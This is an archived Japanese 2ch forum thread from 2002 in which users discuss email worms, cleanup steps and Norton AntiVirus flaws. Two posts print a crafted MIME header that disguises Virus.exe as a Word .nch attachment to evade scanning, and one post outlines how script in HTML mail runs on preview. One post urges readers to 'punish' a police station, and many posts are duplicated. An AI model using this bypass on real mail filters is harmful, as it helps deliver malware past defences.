感染しているのは相手の方という説も。またウイルスが送信者をごまかしているとか。
また誰かが君を装って意図的にメル送ってる可能性もあるかと。
相手に連絡して、送信者のメールヘッダから、IPアドレスを見てみ。
724 :名無しさん@お腹いっぱい。:02/03/13 21:27
725 :722:02/03/13 21:29
>cheshire-catさん
ありがとうございます。
一人の方のメルアドは、プロバにこの方ウイルスにかかっているかも
しれませんよと報告したんです。
他のメールはは大学でした・・・
私は大丈夫だと安心しても良いんでしょうか?
一度IPアドレスを調べてみます。
ありがとうございます。
一人の方のメルアドは、プロバにこの方ウイルスにかかっているかも
しれませんよと報告したんです。
他のメールはは大学でした・・・
私は大丈夫だと安心しても良いんでしょうか?
一度IPアドレスを調べてみます。
726 :名無しさん@お腹いっぱい。:02/03/13 21:34
>724
なるほど。
Windowsで保護されてるファイルも、DOSで起動すれば
delコマンドで削除できるわけですね。
役に立ちそうなので覚えておきます。
問題自体は解決できました。
なるほど。
Windowsで保護されてるファイルも、DOSで起動すれば
delコマンドで削除できるわけですね。
役に立ちそうなので覚えておきます。
問題自体は解決できました。
728 :cheshire-cat:02/03/13 21:39
>>725
>私は大丈夫だと安心しても良いんでしょうか?
うんにゃ。
君のパソコンが、未知Villi感染中って可能性もある。
メーラー使わずにsmtp機能内蔵で自力でメル出すウイルスなら、メーラーにログは残らなかったりするだろうし。
もっとも単純な手だけど、そのパソコンを使わないで放置とか。
そしてその間に相手にメールが届いたんなら、君じゃない、確実に。
まずは相手に時刻と送信元のIPアドレスの問い合わせを。
それから次の手を考えましょうか。
>私は大丈夫だと安心しても良いんでしょうか?
うんにゃ。
君のパソコンが、未知Villi感染中って可能性もある。
メーラー使わずにsmtp機能内蔵で自力でメル出すウイルスなら、メーラーにログは残らなかったりするだろうし。
もっとも単純な手だけど、そのパソコンを使わないで放置とか。
そしてその間に相手にメールが届いたんなら、君じゃない、確実に。
まずは相手に時刻と送信元のIPアドレスの問い合わせを。
それから次の手を考えましょうか。
729 :名無しさん@お腹いっぱい。:02/03/13 21:43
>729
良い機会なのでDOSコマンドを勉強してみます。
良い機会なのでDOSコマンドを勉強してみます。
731 :722:02/03/13 21:47
>cheshire-catさん
何度もありがとうございます。
一人の方に問い合わせてみました。
すぐに返事をくれたのですが私のメルアドからは届いていないらしいのです。
その方がウイルスを送ってきた相手にメールを出しただけで他の人には
一切送っていないとのこと・・・
私に送られてきたメールと同じ内容のものをその人に送ったらしいのです。
意味が判りにくいかもしれませんが、一人の人に送ったメールが何人もの人に
ばらまかれていると言うことなのでしょうか?
何度もありがとうございます。
一人の方に問い合わせてみました。
すぐに返事をくれたのですが私のメルアドからは届いていないらしいのです。
その方がウイルスを送ってきた相手にメールを出しただけで他の人には
一切送っていないとのこと・・・
私に送られてきたメールと同じ内容のものをその人に送ったらしいのです。
意味が判りにくいかもしれませんが、一人の人に送ったメールが何人もの人に
ばらまかれていると言うことなのでしょうか?
732 :cheshire-cat:02/03/13 21:59
733 :名無しさん@お腹いっぱい。:02/03/13 22:05
734 :722:02/03/13 22:07
>cheshire-catさん
「W32.Alcarys.D@mm」これらしいです。
二つのメルアドから送られてきたらしいです。
そしてその人にメールを出したらしいのですが、
そのメールが私の所にも届いたと言うことなんです。
何か文字で説明していると訳がわからなくなってきました。
ごめんなさい。
「W32.Alcarys.D@mm」これらしいです。
二つのメルアドから送られてきたらしいです。
そしてその人にメールを出したらしいのですが、
そのメールが私の所にも届いたと言うことなんです。
何か文字で説明していると訳がわからなくなってきました。
ごめんなさい。
735 :名無しさん@お腹いっぱい。:02/03/13 22:09
すいませんsageなければならなかったんですね。
737 :cheshire-cat:02/03/13 22:42
>>734
アルカリスDは、情報がほとんどまだ出ていない。
実物がないので、ちょっとギブ。お力になれずスマソ。
まずはこれを(もう見たかな?)。
とりあえずアンチウイルスソフトもそうだけど、一応念のためファイル名で検索して感染チェックを。
http://www.symantec.com/region/jp/sarcj/data/w/w32.alcarys.d%40mm.html
最初、表示される送信元アドレスを偽装するのは簡単だから、君を装ってメール出したのかと思ったんだけど。
送信者の項目、数日後にはSymantecあたりで詳細情報出るかも。うーん。
アルカリスDは、情報がほとんどまだ出ていない。
実物がないので、ちょっとギブ。お力になれずスマソ。
まずはこれを(もう見たかな?)。
とりあえずアンチウイルスソフトもそうだけど、一応念のためファイル名で検索して感染チェックを。
http://www.symantec.com/region/jp/sarcj/data/w/w32.alcarys.d%40mm.html
最初、表示される送信元アドレスを偽装するのは簡単だから、君を装ってメール出したのかと思ったんだけど。
送信者の項目、数日後にはSymantecあたりで詳細情報出るかも。うーん。
>cheshire-catさん
本当にありがとうございます。
私Outlookも使っていないし、ノートンを8日にちゃんとウイルス定義も
最新版にしているんです。
と言う事は私は何ともないと喜んでも良いと言うことですよね。
色々聞いてくれてありがとうございました。
本当にありがとうございます。
私Outlookも使っていないし、ノートンを8日にちゃんとウイルス定義も
最新版にしているんです。
と言う事は私は何ともないと喜んでも良いと言うことですよね。
色々聞いてくれてありがとうございました。
739 :名無しさん@お腹いっぱい。:02/03/13 23:37
740 :名無しさん@お腹いっぱい。:02/03/13 23:44
最近文字を入力して変換するとIMEJP,KNL,DLLエラーとなって
シャットダウンしてしまうのですが、
これってウイルスに感染しちゃったんですか?
シャットダウンしてしまうのですが、
これってウイルスに感染しちゃったんですか?
741 :名無しさん@お腹いっぱい。:02/03/13 23:49
自分のPCがウィルスに感染したかどうかわからないすべての質問者へ。
ここで質問するより前にアンチウィルスソフトを買ってきなさい。
それが済んだ上でまだ不安ならここで質問しなさい。
ここで質問するより前にアンチウィルスソフトを買ってきなさい。
それが済んだ上でまだ不安ならここで質問しなさい。
742 :名無しさん@お腹いっぱい。:02/03/13 23:49
>>740
ウィルス検索はしましたか?話はそれからですが。
ウィルス検索はしましたか?話はそれからですが。
743 :名無しさん@お腹いっぱい。:02/03/13 23:51
744 :ナマでパコパコ!!!!:02/03/14 00:03
ナマでパコパコ!!!!
インターネット=ソープランドのマンコ
パソコン=チンコ
これでもナマでヤリますか?
淋、蔵まみれになりますか?
インターネット=ソープランドのマンコ
パソコン=チンコ
これでもナマでヤリますか?
淋、蔵まみれになりますか?
745 :名無しさん@お腹いっぱい。:02/03/14 00:04
740です
ノートンには引っ掛かりませんでした
ノートンには引っ掛かりませんでした
746 :sasa:02/03/14 11:51
件名が「R:重要」とか「R:資料」でpatch.EXEとゆう添付ファイルの付いたウイルスなんですが、
どなたか詳しくご存知のかたはいませんか?
どなたか詳しくご存知のかたはいませんか?
>>746
呼んだ?
呼んだ?
748 :dj:02/03/14 13:39
>>746
patch.exe はうちにも来てます。ファイルサイズは 43,836 bytes
ですが、何なのかよく分からない。
メモ帳で開けてみると、Content-Transfer-Encoding: BASE64 と
書いてあるので、それ自身でメールを発信するのかもしれない。
patch.exe はうちにも来てます。ファイルサイズは 43,836 bytes
ですが、何なのかよく分からない。
メモ帳で開けてみると、Content-Transfer-Encoding: BASE64 と
書いてあるので、それ自身でメールを発信するのかもしれない。
くだ質のここに載ってたべさ・・・逝ってきます
http://pc.2ch.net/test/read.cgi/sec/1014116411/531-
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_FIDAO.A
http://pc.2ch.net/test/read.cgi/sec/1014116411/531-
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_FIDAO.A
750 :名無しさん@お腹いっぱい。:02/03/14 13:59
>>746 それはこれですね
ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_FIDAO.A
今日現在、トレンドマイクロ以外未対応のようだす。
ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_FIDAO.A
今日現在、トレンドマイクロ以外未対応のようだす。
751 :名無しさん@お腹いっぱい。:02/03/14 14:10
これとファイルサイズいっしょだね。
http://www.symantec.com/region/jp/sarcj/data/w/[email protected]
http://www.symantec.com/region/jp/sarcj/data/w/[email protected]
752 :名無しさん@お腹いっぱい。:02/03/14 14:28
トレンドマイクロってパターンファイル240出た?
753 :名無しさん@お腹いっぱい。:02/03/14 17:47
出たらしい?けど今は既に241
754 :Norton AntiVirusに、複数の脆弱性が発見された。:02/03/14 19:50
一つ目は、.dbxまたは.nchに変更されたファイルが 検知できない問題。
二つ目は、NullキャラクターがMIMEタイプに含まれている場合、ウイルスが検知が出来ないという問題。
三つ目は、RFCに準拠していないMIMEフォーマットの中に悪意のあるコードが含まれている場合、
ウイルスの検知動作がストップしてしまう問題。
これらにより、MIMEヘッダーのContent-Typeで、applicationとattachmentを操作されたファイルが
検知されないため、Wordなどのマクロウイルスが検知されずに実行されてしまう。ウイルスメールが検知されず、
トロイの木馬が仕込まれる。スキャン動作が停止されるため、ウイルスメールを受信してしまうなどの問題が発生する。
二つ目は、NullキャラクターがMIMEタイプに含まれている場合、ウイルスが検知が出来ないという問題。
三つ目は、RFCに準拠していないMIMEフォーマットの中に悪意のあるコードが含まれている場合、
ウイルスの検知動作がストップしてしまう問題。
これらにより、MIMEヘッダーのContent-Typeで、applicationとattachmentを操作されたファイルが
検知されないため、Wordなどのマクロウイルスが検知されずに実行されてしまう。ウイルスメールが検知されず、
トロイの木馬が仕込まれる。スキャン動作が停止されるため、ウイルスメールを受信してしまうなどの問題が発生する。
755 :Norton AntiVirusに、複数の脆弱性が発見された。 :02/03/14 19:51
SecurityFocus
Symantec Norton AntiVirus Conflicting MIME Header Vulnerability
http://online.securityfocus.com/bid/4246
SecurityFocus
Symantec Norton AntiVirus Excluded Filetype Email Protection
Bypass Vulnerability
http://online.securityfocus.com/bid/4245
SecurityFocus
Symantec Norton AntiVirus NULL Characters Incoming Email
Protection Bypass Vulnerability
http://online.securityfocus.com/bid/4242
SecurityFocus
Symantec Norton AntiVirus Non-RFC Compliant Email Protection
Bypass Vulnerability
http://online.securityfocus.com/bid/4243
SecuriTeam.com 2002/03/14 追加
Various Vulnerabilities in Norton Anti-Virus 2002
http://www.securiteam.com/windowsntfocus/5PP0B0U6KU.html
Symantec Norton AntiVirus Conflicting MIME Header Vulnerability
http://online.securityfocus.com/bid/4246
SecurityFocus
Symantec Norton AntiVirus Excluded Filetype Email Protection
Bypass Vulnerability
http://online.securityfocus.com/bid/4245
SecurityFocus
Symantec Norton AntiVirus NULL Characters Incoming Email
Protection Bypass Vulnerability
http://online.securityfocus.com/bid/4242
SecurityFocus
Symantec Norton AntiVirus Non-RFC Compliant Email Protection
Bypass Vulnerability
http://online.securityfocus.com/bid/4243
SecuriTeam.com 2002/03/14 追加
Various Vulnerabilities in Norton Anti-Virus 2002
http://www.securiteam.com/windowsntfocus/5PP0B0U6KU.html
756 :Norton AntiVirusに、複数の脆弱性が発見された。:02/03/14 19:53
http://homepage2.nifty.com/spw/secure/index.html
http://www.securiteam.com/windowsntfocus/5PP0B0U6KU.html
Content-Type: application/msword;
name=\"Virus.nch\"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
filename=\"Virus.exe\"
http://www.securiteam.com/windowsntfocus/5PP0B0U6KU.html
Content-Type: application/msword;
name=\"Virus.nch\"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
filename=\"Virus.exe\"
757 :名無しさん@お腹いっぱい。:02/03/14 20:47
HIKARU.A に感染したみたいなのですが初心者でもわかりやすく駆除の仕方を教えてください
758 :名無しさん@お腹いっぱい。:02/03/14 21:33
WORM_JAPANIZE.A
このワームは WORM_FBOUND.B に名称が変更されました。
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_JAPANIZE.A
W32.Impo.Gen@mm
2002年3月14日、W32.FBound@mmからW32.Dotjaypee@mmへ、そしてW32.Impo.Gen@mmに
ウイルス名を変更しました。
テクニカルノート:
メールアドレスの最後が .jpの場合、件名は以下の17種類のうちの中からランダムに送信されます。
件名:
重要
Re:重要
重要なお知らせ
Re:重要なお知らせ
例の件
Re:例の件
お久しぶりです
Re:お久しぶりです
こんにちは
Re:こんにちは
極秘
Re:極秘
資料
Re:資料
蛙
ウャR
うんこ
http://www.symantec.com/region/jp/sarcj/data/w/[email protected]
http://www.nai.com/japan/virusinfo/fbound.asp
このワームは WORM_FBOUND.B に名称が変更されました。
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_JAPANIZE.A
W32.Impo.Gen@mm
2002年3月14日、W32.FBound@mmからW32.Dotjaypee@mmへ、そしてW32.Impo.Gen@mmに
ウイルス名を変更しました。
テクニカルノート:
メールアドレスの最後が .jpの場合、件名は以下の17種類のうちの中からランダムに送信されます。
件名:
重要
Re:重要
重要なお知らせ
Re:重要なお知らせ
例の件
Re:例の件
お久しぶりです
Re:お久しぶりです
こんにちは
Re:こんにちは
極秘
Re:極秘
資料
Re:資料
蛙
ウャR
うんこ
http://www.symantec.com/region/jp/sarcj/data/w/[email protected]
http://www.nai.com/japan/virusinfo/fbound.asp
760 :名無しさん@お腹いっぱい。:02/03/14 23:29
761 :名無しさん@お腹いっぱい。:02/03/14 23:30
ちょっとお聞きしたいのですが、先ほど、何かいかにも怪しそうな題名の
添付ファイルの付いていないメールが届きまして、開けようか止めようか迷っています。
題名は「Thank you」で、送り主のメアドのドメイン名?は @yahoo.com です。
もしかしたら知人からのメールかもしれないので削除して良いものかどうか・・・・・・
メールに添付ファイルが付いていない場合でも、ウイルスに感染する可能性は有るのでしょうか?
どなたかご存じの方がいらっしゃいましたら、お答えくださると幸いです。
添付ファイルの付いていないメールが届きまして、開けようか止めようか迷っています。
題名は「Thank you」で、送り主のメアドのドメイン名?は @yahoo.com です。
もしかしたら知人からのメールかもしれないので削除して良いものかどうか・・・・・・
メールに添付ファイルが付いていない場合でも、ウイルスに感染する可能性は有るのでしょうか?
どなたかご存じの方がいらっしゃいましたら、お答えくださると幸いです。
762 :cheshire-cat:02/03/14 23:39
763 :名無しさん@お腹いっぱい。:02/03/14 23:39
764 :cheshire-cat:02/03/14 23:43
>>763
OEやOutlookのセキュリティを制限サイトにしていない人が多いのは、空しいよね。
OEやOutlookのセキュリティを制限サイトにしていない人が多いのは、空しいよね。
765 :名無しさん@お腹いっぱい。:02/03/14 23:44
添付名が「ppodolpp」となっているのはなんでしょうか?
766 :名無しさん@お腹いっぱい。:02/03/14 23:46
>>764
おっしゃる通りです。
まぁ、XML のセキュリティホールみたいなのもあるんで、何をどうしようが
やられる時やられるというのが現状ですが。
・・・今思いつきましたが、もしかして、XML の穴、OE でもやられる?
おっしゃる通りです。
まぁ、XML のセキュリティホールみたいなのもあるんで、何をどうしようが
やられる時やられるというのが現状ですが。
・・・今思いつきましたが、もしかして、XML の穴、OE でもやられる?
767 :cheshire-cat:02/03/14 23:48
768 :名無しさん@お腹いっぱい。:02/03/14 23:52
ソフトがインストールできないのですが、
ウイルスの可能性はありますか?ちなみに
デジカメとインターネットセキュリティを
こころみましたところ『不正操作を行なったため
終了します』みたいなことが表示されます。
ウイルスの可能性はありますか?ちなみに
デジカメとインターネットセキュリティを
こころみましたところ『不正操作を行なったため
終了します』みたいなことが表示されます。
769 :cheshire-cat:02/03/14 23:52
770 :名無しさん@お腹いっぱい。:02/03/14 23:56
こんなメールが来ました。
htmメール見たいなんですけど。
送信しても大丈夫なのかな?
送信先はMELAD <[email protected]>です。
世直し平成の水戸黄門
正しい世論を喚起し、明るく豊かな新しい日本を創造する
日本国民の最も関心度の高い問題意識に対する
(現金で10万円が当たる抽選券付)
緊 急 世 論 調 査
次のテーマーについてあなたの意見を世論調査に反映させ
新しい日本の創生企画に参画しましょう。
------------------------------------------------------------------------
今、国会を騒がしている、鈴木宗男議員についてあなたのお考えをお聞かせください
------------------------------------------------------------------------
緊急世論調査
鈴木宗男氏は衆議院議員を辞職すべきだ
賛 成 分からない 反 対
htmメール見たいなんですけど。
送信しても大丈夫なのかな?
送信先はMELAD <[email protected]>です。
世直し平成の水戸黄門
正しい世論を喚起し、明るく豊かな新しい日本を創造する
日本国民の最も関心度の高い問題意識に対する
(現金で10万円が当たる抽選券付)
緊 急 世 論 調 査
次のテーマーについてあなたの意見を世論調査に反映させ
新しい日本の創生企画に参画しましょう。
------------------------------------------------------------------------
今、国会を騒がしている、鈴木宗男議員についてあなたのお考えをお聞かせください
------------------------------------------------------------------------
緊急世論調査
鈴木宗男氏は衆議院議員を辞職すべきだ
賛 成 分からない 反 対
771 :名無しさん@お腹いっぱい。:02/03/14 23:58
>>769
HTML をデータベース目的に変形させたようなものです。
ブラウザで見ることもできるのですが、バグのため、一部の
タグに囲まれた範囲が、エリア指定に関らず、ローカル権限
で実行出来るという離れ技が、離れ技が・・・。
HTML をデータベース目的に変形させたようなものです。
ブラウザで見ることもできるのですが、バグのため、一部の
タグに囲まれた範囲が、エリア指定に関らず、ローカル権限
で実行出来るという離れ技が、離れ技が・・・。
772 :cheshire-cat:02/03/14 23:58
>>770
漏れなら返信しない。
漏れなら返信しない。
773 :cheshire-cat:02/03/15 00:01
774 :761:02/03/15 00:03
>763さん
お恥ずかしながら、未だにOutlook Expressを使っております(汗
ただビューウインドは、先だってのウイルス騒ぎに懲りて開いていません。
最近、普通のメールを装ったウイルスメールが多いらしいので、今回も警戒した方がいいかな、
と思いましてお聞きした次第です。
お手数お掛けしますm(_ _)m
お恥ずかしながら、未だにOutlook Expressを使っております(汗
ただビューウインドは、先だってのウイルス騒ぎに懲りて開いていません。
最近、普通のメールを装ったウイルスメールが多いらしいので、今回も警戒した方がいいかな、
と思いましてお聞きした次第です。
お手数お掛けしますm(_ _)m
775 :名無しさん@お腹いっぱい。:02/03/15 00:03
776 :名無しさん@お腹いっぱい。:02/03/15 00:07
777 :cheshire-cat:02/03/15 00:09
>>775
感謝。
勉強しておきます。
その下の、mp3とMediaPlayarの奴、気になるね。
先週ZD-Newsに以前載っていた奴だっけ?
今エクセプションを使ったエロサイトが増えたんで、報告例がトレンドだかで2番目らしいけど。
それ使えば、容易かもね。
感謝。
勉強しておきます。
その下の、mp3とMediaPlayarの奴、気になるね。
先週ZD-Newsに以前載っていた奴だっけ?
今エクセプションを使ったエロサイトが増えたんで、報告例がトレンドだかで2番目らしいけど。
それ使えば、容易かもね。
778 :名無しさん@お腹いっぱい。:02/03/15 00:10
779 :名無しさん@お腹いっぱい。:02/03/15 00:13
>>777
ZDに載ってた奴です。
データファイルそのものにはウィルスはとりつけない
(正確には、とりつけるけど発病出来ない)
という世の中の常識を一気に覆した、ある意味記念すべき
セキュリティホールです。
ZDに載ってた奴です。
データファイルそのものにはウィルスはとりつけない
(正確には、とりつけるけど発病出来ない)
という世の中の常識を一気に覆した、ある意味記念すべき
セキュリティホールです。
780 :cheshire-cat:02/03/15 00:13
781 :cheshire-cat:02/03/15 00:16
>>779
データファイル感染Villi、漏れ的にはPDFとFlashのは革新的だった。
それだけスキルと情報抱えているなら、固定HN名乗ればいいのに。
そうすれば一過性の人格じゃなくて、永らく付き合えるような気が。
データファイル感染Villi、漏れ的にはPDFとFlashのは革新的だった。
それだけスキルと情報抱えているなら、固定HN名乗ればいいのに。
そうすれば一過性の人格じゃなくて、永らく付き合えるような気が。
782 :名無しさん@お腹いっぱい。:02/03/15 00:19
783 :cheshire-cat:02/03/15 00:23
784 :便器:02/03/15 00:23
>>759
もし、「うんこ」ってタイトルでメールが来たら、
送り手に、便器を添付で送ってください。(´Д` )ノ
ご自由に、↓検索欄に、「便器」と書いて、画像をお探しください。(藁
Google イメージ検索
http://www.google.com/imghp?hl=ja
ちなみに、送り手のアドレスは、最初の文字が空白になっているので、
空白分を削除して直さないと返信でません。
もし、「うんこ」ってタイトルでメールが来たら、
送り手に、便器を添付で送ってください。(´Д` )ノ
ご自由に、↓検索欄に、「便器」と書いて、画像をお探しください。(藁
Google イメージ検索
http://www.google.com/imghp?hl=ja
ちなみに、送り手のアドレスは、最初の文字が空白になっているので、
空白分を削除して直さないと返信でません。
785 :名無しさん@お腹いっぱい。:02/03/15 00:28
>>784
送り手も、無知が故の被害者の可能性があり、あまりお薦めしません。
送り手も、無知が故の被害者の可能性があり、あまりお薦めしません。
786 :名無しさん@お腹いっぱい。:02/03/15 01:03
>>770
Google でそのメアドちょこっと検索したが、
http://www.benham.net/pipermail/debbugs/2002-January/
こんな感じのが出てきた。
なんのページだか分からないし、該当箇所クリックしてもエンコード
が変で内容読めないが、はっきり言って、まっとうな連中とは思えん。
Google でそのメアドちょこっと検索したが、
http://www.benham.net/pipermail/debbugs/2002-January/
こんな感じのが出てきた。
なんのページだか分からないし、該当箇所クリックしてもエンコード
が変で内容読めないが、はっきり言って、まっとうな連中とは思えん。
787 :名無しさん@お腹いっぱい。:02/03/15 01:23
>>786
それと、内容的には、「反対・賛成・その他」を書き込ませるだけのもの。
何が目的かっていうと、多分、
・送信元はメールアドレスを大量に持っている(多分、10万単位で)
・しかし、そのうち、生きている(現在使われている)アドレスが分からない。
・そこで、片っ端から、このメールを投げる
・真面目に返信してきたら、それは生きているメールアドレス
・生きているアドレスが分かったら、そこ宛てに、オンラインカジノやらポルノやら
億万長者になる方法やらのメールを送信(広告)。死んでるアドレスに投げると宛
て先不明で返ってきて処理に困るから。
それと、内容的には、「反対・賛成・その他」を書き込ませるだけのもの。
何が目的かっていうと、多分、
・送信元はメールアドレスを大量に持っている(多分、10万単位で)
・しかし、そのうち、生きている(現在使われている)アドレスが分からない。
・そこで、片っ端から、このメールを投げる
・真面目に返信してきたら、それは生きているメールアドレス
・生きているアドレスが分かったら、そこ宛てに、オンラインカジノやらポルノやら
億万長者になる方法やらのメールを送信(広告)。死んでるアドレスに投げると宛
て先不明で返ってきて処理に困るから。
788 :名無しさん@お腹いっぱい。:02/03/15 01:25
789 :名無しさん@お腹いっぱい。:02/03/15 01:28
790 : :02/03/15 18:53
質問です。
メールのウィルスで、OEでプレビューするだけで作動するものが
あったかと思うのですが、なんと言う名前で、
どういう機能を利用して作動するものだったのでしょうか。
791 :名無しさん@お腹いっぱい。:02/03/15 19:05
792 :名無しさん@お腹いっぱい。:02/03/15 19:51
>>790
「どういう機能を利用して」の部分がよく分からないのですが、
何を知りたいのでしょうか?
それと、BADTRANS_Bは、ウィルス活動(感染)は行わずに、ワーム
活動のみなので、厳密に言うとウィルスとは呼ばなかったりします。
「どういう機能を利用して」の部分がよく分からないのですが、
何を知りたいのでしょうか?
それと、BADTRANS_Bは、ウィルス活動(感染)は行わずに、ワーム
活動のみなので、厳密に言うとウィルスとは呼ばなかったりします。
793 :790:02/03/15 20:13
どういう機能というのは、
JavaScriptとか、ActiveXとかそういうことです。
確か一年位前に初めて出現したような記憶があります。
JavaScriptとか、ActiveXとかそういうことです。
確か一年位前に初めて出現したような記憶があります。
794 :名無しさん@お腹いっぱい。:02/03/15 20:24
>>793
1) スクリプトを埋めこんだHTMLメールを用意します
2) Outlook Express または Outlook で受信します。
3) アウトルックで、HTMLメールの件名をクリックします。
4) OE または Outlook では、HTMLメールをプレビューモードで開きます。
5) OE または Outlook は、HTML メールを読む時は、IE を内部的に呼びます。
6) IE が埋めこまれたスクリプトを実行。
という流れです。ここでは、HTMLメール内に埋めこむのは Java Script でも
ActiveX でも Visual Basic Script でもなんでもありです。要は、HTML に
記述、実行出来るものならなんでも OK です。
1) スクリプトを埋めこんだHTMLメールを用意します
2) Outlook Express または Outlook で受信します。
3) アウトルックで、HTMLメールの件名をクリックします。
4) OE または Outlook では、HTMLメールをプレビューモードで開きます。
5) OE または Outlook は、HTML メールを読む時は、IE を内部的に呼びます。
6) IE が埋めこまれたスクリプトを実行。
という流れです。ここでは、HTMLメール内に埋めこむのは Java Script でも
ActiveX でも Visual Basic Script でもなんでもありです。要は、HTML に
記述、実行出来るものならなんでも OK です。
795 :名無しさん@お腹いっぱい。:02/03/15 20:29
>>793
やや記憶が曖昧ながらNimda。
だとすると去年の9月後半くらいか。
http://www.symantec.com/region/jp/sarcj/data/w/[email protected]
外した、中盤だ。MIMEコードのファイル誤認識を利用して、
exeファイルを自動実行。Windowsメディアプレーヤーが起動した。
やや記憶が曖昧ながらNimda。
だとすると去年の9月後半くらいか。
http://www.symantec.com/region/jp/sarcj/data/w/[email protected]
外した、中盤だ。MIMEコードのファイル誤認識を利用して、
exeファイルを自動実行。Windowsメディアプレーヤーが起動した。
796 :名無しさん@お腹いっぱい。:02/03/15 20:49
>793
http://www.symantec.com/region/jp/sarcj/data/v/vbs.bubbleboy.html
最初はVBS.BubbleBoyが見ただけで感染するウイルス。
しかし、日本語環境では感染できなかった。
余談かもしれんが一応。
http://www.symantec.com/region/jp/sarcj/data/v/vbs.bubbleboy.html
最初はVBS.BubbleBoyが見ただけで感染するウイルス。
しかし、日本語環境では感染できなかった。
余談かもしれんが一応。
797 :cheshire-cat:02/03/16 00:35
>>793
MS99-032とMS01-020。
一番最初のは、796の人のレスのバブルボーイ。
これは日本語版のOSだと、インストール先のフォルダが無かったらしい。
でもOEのセキュリティをめちゃくちゃ固めると、起動できない。
ダイレクトアクション系は、BubbleBoy、Aliz, Badtrans, Klez, Nimda, Toalなど。
MS99-032とMS01-020。
一番最初のは、796の人のレスのバブルボーイ。
これは日本語版のOSだと、インストール先のフォルダが無かったらしい。
でもOEのセキュリティをめちゃくちゃ固めると、起動できない。
ダイレクトアクション系は、BubbleBoy、Aliz, Badtrans, Klez, Nimda, Toalなど。
798 :名無しさん@お腹いっぱい。:02/03/16 03:26
799 :名無しさん@お腹いっぱい。:02/03/16 12:34
JS_EXCEPTION.GEN
に感染したんですけど、どうやったら駆除できますか?
に感染したんですけど、どうやったら駆除できますか?
800 :名無しさん@お腹いっぱい。:02/03/16 12:42
>>799
さっさとアンチウィルスソフトを買ってこい。
さっさとアンチウィルスソフトを買ってこい。
801 :名無しさん@お腹いっぱい。:02/03/16 12:44
先日のひろゆきへの佐々木という人物の脅迫事件を扱った赤羽警察署は
ひろゆきが被害者であるにも関わらず、ひろゆきに対し、随分と横柄な
態度をしたらしい。
よって2ちゃんねらーの力で赤羽警察に制裁を加えなくてはならない。
赤羽警察の不祥事等情報求む!
http://mentai.2ch.net/test/read.cgi/police/1014406027/
ひろゆきが被害者であるにも関わらず、ひろゆきに対し、随分と横柄な
態度をしたらしい。
よって2ちゃんねらーの力で赤羽警察に制裁を加えなくてはならない。
赤羽警察の不祥事等情報求む!
http://mentai.2ch.net/test/read.cgi/police/1014406027/
802 :+anonymous:02/03/16 12:49
>>799
実はJS_EXCEPTION.GENの"駆除"はできない。
ていうか手動でFileを削除して書き換えられた設定を元にもどせばOK。
インターネットオプションから設定を書き直しても元に戻るようなシツコイ場合は、
MS-DOSモードで起動→"scanreg /restore"でレジストリまるまる復元。
参考
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=JS_EXCEPTION.GEN
実はJS_EXCEPTION.GENの"駆除"はできない。
ていうか手動でFileを削除して書き換えられた設定を元にもどせばOK。
インターネットオプションから設定を書き直しても元に戻るようなシツコイ場合は、
MS-DOSモードで起動→"scanreg /restore"でレジストリまるまる復元。
参考
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=JS_EXCEPTION.GEN
803 :名無しさん@お腹いっぱい。:02/03/16 13:00
804 :名無しさん@お腹いっぱい。:02/03/16 13:01
あっ、でました
805 :名無しさん@お腹いっぱい。:02/03/16 15:39
806 :Norton AntiVirusに、複数の脆弱性が発見された。 :02/03/16 15:39
http://homepage2.nifty.com/spw/secure/index.html
http://www.securiteam.com/windowsntfocus/5PP0B0U6KU.html
Content-Type: application/msword;
name=\"Virus.nch\"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
filename=\"Virus.exe\"
http://www.securiteam.com/windowsntfocus/5PP0B0U6KU.html
Content-Type: application/msword;
name=\"Virus.nch\"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
filename=\"Virus.exe\"
807 :名無しさん@お腹いっぱい。:02/03/16 15:42
808 :名無しさん@お腹いっぱい。:02/03/16 16:00
>>806
2002限定なのかな?
2002限定なのかな?
809 :名無しさん@お腹いっぱい。:02/03/16 16:18
スマンテック
できるヤツは、そもそも日本には居ねぇーんだよ
できるヤツは、そもそも日本には居ねぇーんだよ
810 : :02/03/16 17:14
nchではないが似たようなものが
http://easyweb.easynet.co.uk/~hiros/Virus.htm
アンチウィルスソフトで発見不能ウィルス(全てのアンチウィルスで発見できないわけではありません)
の
「cb4111」 も似たようなもの?
http://easyweb.easynet.co.uk/~hiros/Virus.htm
アンチウィルスソフトで発見不能ウィルス(全てのアンチウィルスで発見できないわけではありません)
の
「cb4111」 も似たようなもの?
811 :cheshire-cat:02/03/16 18:34
>>806
Nortonの除外リストから、dbxとnchのエクステンションはずせばいいだけのような気が。
Mail保護から漏れても、常駐スキャンでプロセス停止されないのかな。
>>810
以前調べたら、マクロをExcel→Wordだかその逆方向で貼り付けていたので、コードが含まれているにも関わらず検出されないだけだった。
Nortonの除外リストから、dbxとnchのエクステンションはずせばいいだけのような気が。
Mail保護から漏れても、常駐スキャンでプロセス停止されないのかな。
>>810
以前調べたら、マクロをExcel→Wordだかその逆方向で貼り付けていたので、コードが含まれているにも関わらず検出されないだけだった。
812 :cheshire-cat:02/03/16 18:35
除外拡張子、はずすとどうなるんだ?
ちょっと楽しみ。
ちょっと楽しみ。
813 :cheshire-cat:02/03/16 19:35
はずしてもなぜ不具合が生じないのか不思議だったんだけど。
Outlook Expressを使っていなければ、除外しなくても不具合が起きなかった。
http://service2.symantec.co.jp/jp-support/faqpub_si.nsf/543a1624cf3230b349256a5d004a46e1/b877a752580252a449256aff005d2c63?OpenDocument
http://service2.symantec.co.jp/jp-support/faqpub_si.nsf/543a1624cf3230b349256a5d004a46e1/7a1bb8160ac42cb649256aff005cf154?OpenDocument
http://service2.symantec.co.jp/jp-support/faqpub_si.nsf/7a63e7e7d6a83a5f49256a5d004a46e0/d1e544250123822949256aee00027bad?OpenDocument
